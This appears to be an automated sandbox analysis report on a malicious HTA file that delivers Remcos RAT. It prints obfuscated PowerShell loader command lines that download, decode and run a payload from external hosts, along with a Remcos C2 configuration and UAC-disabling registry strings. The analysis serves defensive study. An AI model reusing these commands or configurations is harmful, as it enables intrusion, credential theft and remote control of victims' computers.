Windows Analysis Report
sweetbabygivenbestthignsetnirelifegivenbackbestthignsalways.hta

Overview

General Information

Sample name: sweetbabygivenbestthignsetnirelifegivenbackbestthignsalways.hta
Analysis ID: 1562937
MD5: 5a9dc05899d1a19be638824e5f47b88e
SHA1: 418e5c2cfc4ba40069bbcbc7373e9ff0b71740f2
SHA256: 741297ecc59d39296f360b100032cdb120af2eb4ccc5b91f370c0eacb9ee7e25
Tags: hta, user-abuse_ch

Detection

Cobalt Strike, Remcos, HTMLPhisher
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Contains functionality to bypass UAC (CMSTPLUA)
Detected Cobalt Strike Beacon
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected HtmlPhish44
Yara detected Powershell decode and execute
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Delayed program exit found
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Obfuscated command line found
PowerShell case anomaly found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Compiles C# or VB.Net code
Contains functionality to read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found; this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • mshta.exe (PID: 7420 cmdline: mshta.exe "C:\Users\user\Desktop\sweetbabygivenbestthignsetnirelifegivenbackbestthignsalways.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • powershell.exe (PID: 7492 cmdline: "C:\Windows\sysTEm32\WInDowSpoWeRShell\V1.0\POwersheLL.exE" "powErsHEll.eXE -EX BYpaSs -noP -W 1 -C dEViCEcReDEntIaLDEployMENt ; IeX($(iEX('[SYsTem.tExT.EnCoDINg]'+[ChAR]0x3a+[ChaR]0x3a+'utF8.GeTSTrING([SystEM.cOnvERt]'+[CHAR]0x3a+[cHAR]58+'FrOMbASe64STrING('+[CHAr]34+'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'+[cHaR]0x22+'))')))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7624 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX BYpaSs -noP -W 1 -C dEViCEcReDEntIaLDEployMENt MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • csc.exe (PID: 7760 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\blaytqul\blaytqul.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
        • cvtres.exe (PID: 7776 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF818.tmp" "c:\Users\user\AppData\Local\Temp\blaytqul\CSC6824B6AE21FF4F1D9A4E95662E7FF991.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
      • wscript.exe (PID: 7864 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\bestofthingswithentiretimegivenebstthignstodowithg.vBs" MD5: FF00E0480075B095948000BDC66E81F0)
        • powershell.exe (PID: 7916 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 7924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 8032 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('2kdimag'+'eUrl = eC4https://3105.filemail.com/api/file/'+'get?filekey=s'+'hTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-'+'dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c eC4;2kdwebClient = New-Object System.Net.WebClient;2kdimageBytes = 2kdwebClient.Dow'+'n'+'loadData(2kdimageUrl);2kdimageText = '+'[System.Te'+'xt.Encoding]::UTF8.GetString(2kdimageBytes'+');2kdstartFlag = eC4<<BASE64_START>>eC'+'4;2kdendFlag = eC4<<BASE64_END>>eC4;2kdstartIndex = 2kdimageText.IndexOf(2kdstartFlag);2kde'+'n'+'dIndex = 2kdimageText.Index'+'Of(2kdendFla'+'g);2kdstartIndex -ge 0 -and 2kdendIndex -gt 2kdstar'+'tIndex;2kdstartIndex += 2kdstartFlag.Lengt'+'h;2kdbase64Length = 2kdendIndex - 2kdstartIndex;2kdbase64Command = 2k'+'dimageT'+'ext.Substring(2kdstartIndex, 2kdbase64Length);2kdbase64Re'+'versed = -join (2kdbase64Command.ToCharArray() syV ForEach-Object { 2kd_ })[-1..-(2kdbase64Command.Length)];2kdcommandBytes = [System.Convert]::FromBas'+'e64String(2kdbase64Reversed);2kdloadedAssembly = [System.Reflection.Assembly]::Load(2kdcommandBytes);2kdvaiMethod = [dnlib.IO.Home].GetMethod(eC4VAIeC4);2kdvaiMethod.Invoke('+'2kdnull, @(eC4txt.FGVGFR/2241/62.64.8'+'61.401//:pttheC4, eC4desativadoeC4, eC4desativadoeC4, eC4desativadoeC4,'+' eC4CasPoleC4, eC4desativadoeC4, eC4desativadoeC4,eC'+'4desativado'+'eC4,eC4desati'+'vadoeC4,eC4desativadoeC4,eC4desativadoeC4,eC4desativadoeC'+'4,eC41eC4,eC4desativadoeC4));') -creplACe ([chAR]115+[chAR]121+[chAR]86),[chAR]124 -RePLAce ([chAR]50+[chAR]107+[chAR]100),[chAR]36 -creplACe'eC4',[chAR]39)| .((gv '*MDr*').NAMe[3,11,2]-jOiN'')" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • CasPol.exe (PID: 5480 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": ["nextnewupdationsforu.duckdns.org:14645:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-EC111K", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
Source | Rule | Description | Author
sweetbabygivenbestthignsetnirelifegivenbackbestthignsalways.hta | JoeSecurity_HtmlPhish_44 | Yara detected HtmlPhish_44 | Joe Security
Source | Rule | Description | Author
0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_Remcos_b296e965 | unknown | unknown
  • 0x6b6f8:$a1: Remcos restarted by watchdog!
  • 0x6bc70:$a3: %02i:%02i:%02i:%03i
0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp | REMCOS_RAT_variants | unknown | unknown
  • 0x65994:$str_a1: C:\Windows\System32\cmd.exe
  • 0x65910:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x65910:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x65e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x66410:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x65a04:$str_b2: Executing file:
  • 0x6683c:$str_b3: GetDirectListeningPort
  • 0x66200:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x66380:$str_b7: \update.vbs
  • 0x65a2c:$str_b9: Downloaded file:
  • 0x65a18:$str_b10: Downloading file:
  • 0x65abc:$str_b12: Failed to upload file:
  • 0x66804:$str_b13: StartForward
  • 0x66824:$str_b14: StopForward
  • 0x662d8:$str_b15: fso.DeleteFile "
  • 0x6626c:$str_b16: On Error Resume Next
  • 0x66308:$str_b17: fso.DeleteFolder "
  • 0x65aac:$str_b18: Uploaded file:
  • 0x65a6c:$str_b19: Unable to delete:
  • 0x662a0:$str_b20: while fso.FileExists("
  • 0x65f49:$str_c0: [Firefox StoredLogins not found]
Source | Rule | Description | Author
13.2.CasPol.exe.400000.0.raw.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
13.2.CasPol.exe.400000.0.raw.unpack | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
13.2.CasPol.exe.400000.0.raw.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
13.2.CasPol.exe.400000.0.raw.unpack | Windows_Trojan_Remcos_b296e965 | unknown | unknown
  • 0x6b6f8:$a1: Remcos restarted by watchdog!
  • 0x6bc70:$a3: %02i:%02i:%02i:%03i
13.2.CasPol.exe.400000.0.raw.unpack | REMCOS_RAT_variants | unknown | unknown
  • 0x65994:$str_a1: C:\Windows\System32\cmd.exe
  • 0x65910:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x65910:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x65e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x66410:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x65a04:$str_b2: Executing file:
  • 0x6683c:$str_b3: GetDirectListeningPort
  • 0x66200:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x66380:$str_b7: \update.vbs
  • 0x65a2c:$str_b9: Downloaded file:
  • 0x65a18:$str_b10: Downloading file:
  • 0x65abc:$str_b12: Failed to upload file:
  • 0x66804:$str_b13: StartForward
  • 0x66824:$str_b14: StopForward
  • 0x662d8:$str_b15: fso.DeleteFile "
  • 0x6626c:$str_b16: On Error Resume Next
  • 0x66308:$str_b17: fso.DeleteFolder "
  • 0x65aac:$str_b18: Uploaded file:
  • 0x65a6c:$str_b19: Unable to delete:
  • 0x662a0:$str_b20: while fso.FileExists("
  • 0x65f49:$str_c0: [Firefox StoredLogins not found]
Source | Rule | Description | Author
amsi32_7492.amsi.csv | JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security
amsi32_8032.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security

System Summary

                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnMmtkaW1hZycrJ2VVcmwgPSBlQzRodHRwczovLzMxMDUuZmlsZW1haWwuY29tL2FwaS9maWxlLycrJ2dldD9maWxla2V5PXMnKydoVFBIYkNQWDhvLWxPdENxSExHNl8weEN5LXhsNHRueGxBVmJROTUtJysnZHZpVEs1Y0FSYU5kUWpiYjNtZXhmd1F6S21UWGcmc2tpcHJlZz10cnVlJnBrX3ZpZD1lMDEwOTYzOGM5YmZiOTU3MTczMjUzMTMwOWI1ZmY3YyBlQzQ7Mmtkd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDsya2RpbWFnZUJ5dGVzID0gMmtkd2ViQ2xpZW50LkRvdycrJ24nKydsb2FkRGF0YSgya2RpbWFnZVVybCk7MmtkaW1hZ2VUZXh0ID0gJysnW1N5c3RlbS5UZScrJ3h0LkVuY29kaW5nXTo6VVRGOC5HZXRT
                    Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('2kdimag'+'eUrl = eC4https://3105.filemail.com/api/file/'+'get?filekey=s'+'hTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-'+'dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c eC4;2kdwebClient = New-Object System.Net.WebClient;2kdimageBytes = 2kdwebClient.Dow'+'n'+'loadData(2kdimageUrl);2kdimageText = '+'[System.Te'+'xt.Encoding]::UTF8.GetString(2kdimageBytes'+');2kdstartFlag = eC4<<BASE64_START>>eC'+'4;2kdendFlag = eC4<<BASE64_END>>eC4;2kdstartIndex = 2kdimageText.IndexOf(2kdstartFlag);2kde'+'n'+'dIndex = 2kdimageText.Index'+'Of(2kdendFla'+'g);2kdstartIndex -ge 0 -and 2kdendIndex -gt 2kdstar'+'tIndex;2kdstartIndex += 2kdstartFlag.Lengt'+'h;2kdbase64Length = 2kdendIndex - 2kdstartIndex;2kdbase64Command = 2k'+'dimageT'+'ext.Substring(2kdstartIndex, 2kdbase64Length);2kdbase64Re'+'versed = -join (2kdbase64Command.ToCharArray() syV ForEach-Object { 2kd_ })[-1..-(2kdbase64Command.Length)];2kdcommandBytes = [System.Convert]::FromBas'+'e64String(2kdbase64Reversed);2kdloadedAssembly = [System.Reflection.Assembly]::Load(2kdcommandBytes);2kdvaiMethod = [dnlib.IO.Home].GetMethod(eC4VAIeC4);2kdvaiMethod.Invoke('+'2kdnull, @(eC4txt.FGVGFR/2241/62.64.8'+'61.401//:pttheC4, eC4desativadoeC4, eC4desativadoeC4, eC4desativadoeC4,'+' eC4CasPoleC4, eC4desativadoeC4, eC4desativadoeC4,eC'+'4desativado'+'eC4,eC4desati'+'vadoeC4,eC4desativadoeC4,eC4desativadoeC4,eC4desativadoeC'+'4,eC41eC4,eC4desativadoeC4));') -creplACe ([chAR]115+[chAR]121+[chAR]86),[chAR]124 -RePLAce ([chAR]50+[chAR]107+[chAR]100),[chAR]36 -creplACe'eC4',[chAR]39)| .((gv '*MDr*').NAMe[3,11,2]-jOiN'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass 
-NoProfile -command "(('2kdimag'+'eUrl = eC4https://3105.filemail.com/api/file/'+'get?filekey=s'+'hTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-'+'dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c eC4;2kdwebClient = New-Object System.Net.WebClient;2kdimageBytes = 2kdwebClient.Dow'+'n'+'loadData(2kdimageUrl);2kdimageText = '+'[System.Te'+'xt.Encoding]::UTF8.GetString(2kdimageBytes'+');2kdstartFlag = eC4<<BASE64_START>>eC'+'4;2kdendFlag = eC4<<BASE64_END>>eC4;2kdstartIndex = 2kdimageText.IndexOf(2kdstartFlag);2kde'+'n'+'dIndex = 2kdimageText.Index'+'Of(2kdendFla'+'g);2kdstartIndex -ge 0 -and 2kdendIndex -gt 2kdstar'+'tIndex;2kdstartIndex += 2kdstartFlag.Lengt'+'h;2kdbase64Length = 2kdendIndex - 2kdstartIndex;2kdbase64Command = 2k'+'dimageT'+'ext.Substring(2kdstartIndex, 2kdbase64Length);2kdbase64Re'+'versed = -join (2kdbase64Command.ToCharArray() syV ForEach-Object { 2kd_ })[-1..-(2kdbase64Command.Length)];2kdcommandBytes = [System.Convert]::FromBas'+'e64String(2kdbase64Reversed);2kdloadedAssembly = [System.Reflection.Assembly]::Load(2kdcommandBytes);2kdvaiMethod = [dnlib.IO.Home].GetMethod(eC4VAIeC4
                    Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('2kdimag'+'eUrl = eC4https://3105.filemail.com/api/file/'+'get?filekey=s'+'hTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-'+'dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c eC4;2kdwebClient = New-Object System.Net.WebClient;2kdimageBytes = 2kdwebClient.Dow'+'n'+'loadData(2kdimageUrl);2kdimageText = '+'[System.Te'+'xt.Encoding]::UTF8.GetString(2kdimageBytes'+');2kdstartFlag = eC4<<BASE64_START>>eC'+'4;2kdendFlag = eC4<<BASE64_END>>eC4;2kdstartIndex = 2kdimageText.IndexOf(2kdstartFlag);2kde'+'n'+'dIndex = 2kdimageText.Index'+'Of(2kdendFla'+'g);2kdstartIndex -ge 0 -and 2kdendIndex -gt 2kdstar'+'tIndex;2kdstartIndex += 2kdstartFlag.Lengt'+'h;2kdbase64Length = 2kdendIndex - 2kdstartIndex;2kdbase64Command = 2k'+'dimageT'+'ext.Substring(2kdstartIndex, 2kdbase64Length);2kdbase64Re'+'versed = -join (2kdbase64Command.ToCharArray() syV ForEach-Object { 2kd_ })[-1..-(2kdbase64Command.Length)];2kdcommandBytes = [System.Convert]::FromBas'+'e64String(2kdbase64Reversed);2kdloadedAssembly = [System.Reflection.Assembly]::Load(2kdcommandBytes);2kdvaiMethod = [dnlib.IO.Home].GetMethod(eC4VAIeC4);2kdvaiMethod.Invoke('+'2kdnull, @(eC4txt.FGVGFR/2241/62.64.8'+'61.401//:pttheC4, eC4desativadoeC4, eC4desativadoeC4, eC4desativadoeC4,'+' eC4CasPoleC4, eC4desativadoeC4, eC4desativadoeC4,eC'+'4desativado'+'eC4,eC4desati'+'vadoeC4,eC4desativadoeC4,eC4desativadoeC4,eC4desativadoeC'+'4,eC41eC4,eC4desativadoeC4));') -creplACe ([chAR]115+[chAR]121+[chAR]86),[chAR]124 -RePLAce ([chAR]50+[chAR]107+[chAR]100),[chAR]36 -creplACe'eC4',[chAR]39)| .((gv '*MDr*').NAMe[3,11,2]-jOiN'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile 
-command "(('2kdimag'+'eUrl = eC4https://3105.filemail.com/api/file/'+'get?filekey=s'+'hTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-'+'dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c eC4;2kdwebClient = New-Object System.Net.WebClient;2kdimageBytes = 2kdwebClient.Dow'+'n'+'loadData(2kdimageUrl);2kdimageText = '+'[System.Te'+'xt.Encoding]::UTF8.GetString(2kdimageBytes'+');2kdstartFlag = eC4<<BASE64_START>>eC'+'4;2kdendFlag = eC4<<BASE64_END>>eC4;2kdstartIndex = 2kdimageText.IndexOf(2kdstartFlag);2kde'+'n'+'dIndex = 2kdimageText.Index'+'Of(2kdendFla'+'g);2kdstartIndex -ge 0 -and 2kdendIndex -gt 2kdstar'+'tIndex;2kdstartIndex += 2kdstartFlag.Lengt'+'h;2kdbase64Length = 2kdendIndex - 2kdstartIndex;2kdbase64Command = 2k'+'dimageT'+'ext.Substring(2kdstartIndex, 2kdbase64Length);2kdbase64Re'+'versed = -join (2kdbase64Command.ToCharArray() syV ForEach-Object { 2kd_ })[-1..-(2kdbase64Command.Length)];2kdcommandBytes = [System.Convert]::FromBas'+'e64String(2kdbase64Reversed);2kdloadedAssembly = [System.Reflection.Assembly]::Load(2kdcommandBytes);2kdvaiMethod = [dnlib.IO.Home].GetMethod(eC4VAIeC4
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\bestofthingswithentiretimegivenebstthignstodowithg.vBs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\bestofthingswithentiretimegivenebstthignstodowithg.vBs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\sysTEm32\WInDowSpoWeRShell\V1.0\POwersheLL.exE" "powErsHEll.eXE -EX BYpaSs -noP -W 1 -C dEViCEcReDEntIaLDEployMENt ; IeX($(iEX('[SYsTem.tExT.EnCoDINg]'+[ChAR]0x3a+[ChaR]0x3a+'utF8.GeTSTrING([SystEM.cOnvERt]'+[CHAR]0x3a+[cHAR]58+'FrOMbASe64STrING('+[CHAr]34+'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'+[cHaR]0x22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7492, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\bestofthingswithentiretimegivenebstthignstodowithg.vBs" , ProcessId: 7864, ProcessName: wscript.exe
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnMmtkaW1hZycrJ2VVcmwgPSBlQzRodHRwczovLzMxMDUuZmlsZW1haWwuY29tL2FwaS9maWxlLycrJ2dldD9maWxla2V5PXMnKydoVFBIYkNQWDhvLWxPdENxSExHNl8weEN5LXhsNHRueGxBVmJROTUtJysnZHZpVEs1Y0FSYU5kUWpiYjNtZXhmd1F6S21UWGcmc2tpcHJlZz10cnVlJnBrX3ZpZD1lMDEwOTYzOGM5YmZiOTU3MTczMjUzMTMwOWI1ZmY3YyBlQzQ7Mmtkd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDsya2RpbWFnZUJ5dGVzID0gMmtkd2ViQ2xpZW50LkRvdycrJ24nKydsb2FkRGF0YSgya2RpbWFnZVVybCk7MmtkaW1hZ2VUZXh0ID0gJysnW1N5c3RlbS5UZScrJ3h0LkVuY29kaW5nXTo6VVRGOC5HZXRT
                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\sysTEm32\WInDowSpoWeRShell\V1.0\POwersheLL.exE" "powErsHEll.eXE -EX BYpaSs -noP -W 1 -C dEViCEcReDEntIaLDEployMENt ; IeX($(iEX('[SYsTem.tExT.EnCoDINg]'+[ChAR]0x3a+[ChaR]0x3a+'utF8.GeTSTrING([SystEM.cOnvERt]'+[CHAR]0x3a+[cHAR]58+'FrOMbASe64STrING('+[CHAr]34+'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'+[cHaR]0x22+'))')))", CommandLine: "C:\Windows\sysTEm32\WInDowSpoWeRShell\V1.0\POwersheLL.exE" "powErsHEll.eXE -EX BYpaSs -noP -W 1 -C dEViCEcReDEntIaLDEployMENt ; IeX($(iEX('[SYsTem.tExT.EnCoDINg]'+[ChAR]0x3a+[ChaR]0x3a+'utF8.GeTSTrING([SystEM.cOnvERt]'+[CHAR]0x3a+[cHAR]58+'FrOMbASe64STrING('+[CHAr]34+'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
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX BYpaSs -noP -W 1 -C dEViCEcReDEntIaLDEployMENt, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX BYpaSs -noP -W 1 -C dEViCEcReDEntIaLDEployMENt, CommandLine|base64offset|contains: E, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\sysTEm32\WInDowSpoWeRShell\V1.0\POwersheLL.exE" "powErsHEll.eXE -EX BYpaSs -noP -W 1 -C dEViCEcReDEntIaLDEployMENt ; IeX($(iEX('[SYsTem.tExT.EnCoDINg]'+[ChAR]0x3a+[ChaR]0x3a+'utF8.GeTSTrING([SystEM.cOnvERt]'+[CHAR]0x3a+[cHAR]58+'FrOMbASe64STrING('+[CHAr]34+'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'+[cHaR]0x22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7492, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX BYpaSs -noP -W 1 -C dEViCEcReDEntIaLDEployMENt, ProcessId: 7624, ProcessName: powershell.exe
